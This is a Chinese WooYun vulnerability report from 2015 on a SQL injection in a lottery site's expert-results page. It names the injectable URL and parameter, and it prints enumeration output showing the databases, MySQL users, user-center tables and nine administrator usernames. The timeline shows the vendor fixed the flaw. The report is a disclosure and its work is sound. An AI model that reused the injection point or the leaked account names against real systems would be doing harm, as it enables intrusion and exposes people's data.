漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0108789
漏洞标题:乐彩网某站点root权限mysql注入(泄露大量数据)
相关厂商:乐彩网
漏洞作者: 大懒
提交时间:2015-04-20 16:25
修复时间:2015-05-08 17:00
公开时间:2015-05-08 17:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-08: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
乐彩某站点注入泄露大量数据
详细说明:
存在问题的URL:http://lebi.17500.cn/experts/results/index/mtype/schs/eid/2514*
这里做了伪静态
存在问题应该是eid=2514
available databases [11]:
[*] bbslog
[*] cnlot2004
[*] information_schema
[*] lottery
[*] mysql
[*] newlebi
[*] performance_schema
[*] test
[*] uc
[*] ucbak
[*] uprofile
database management system users [4]:
[*] 'repl'@'192.168.%'
[*] 'root'@'192.168.100.%'
[*] 'root'@'localhost'
[*] 'user-read'@'192.168.100.%'
Database: uc
[39 tables]
+---------------------+
| uc_admin_js |
| uc_admins |
| uc_applications |
| uc_avatar_validate |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mail_log_0 |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_pms |
| uc_protectedmembers |
| uc_repass_log_0 |
| uc_settings |
| uc_sms_log_0 |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| uc_weakhomepwd_log |
| uc_weakpwd_log |
+---------------------+
Table: uc_admins
[9 entries]
+----------+
| username |
+----------+
| 4两搏千金 |
| eren |
| sky |
| 航线 |
| 好运2013 |
| 柯森 |
| 十一层 |
| 小美 |
| 转身的距离 |
+----------+
权限较高,风险较大
漏洞证明:
如上
修复方案:
1.过滤特殊字符
2.结构化sql查询
版权声明:转载请注明来源 大懒@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-04-20 17:06
厂商回复:
感谢。已收到。速度解决。
最新状态:
2015-04-20:已经处理,等待测试
2015-05-08:已经处理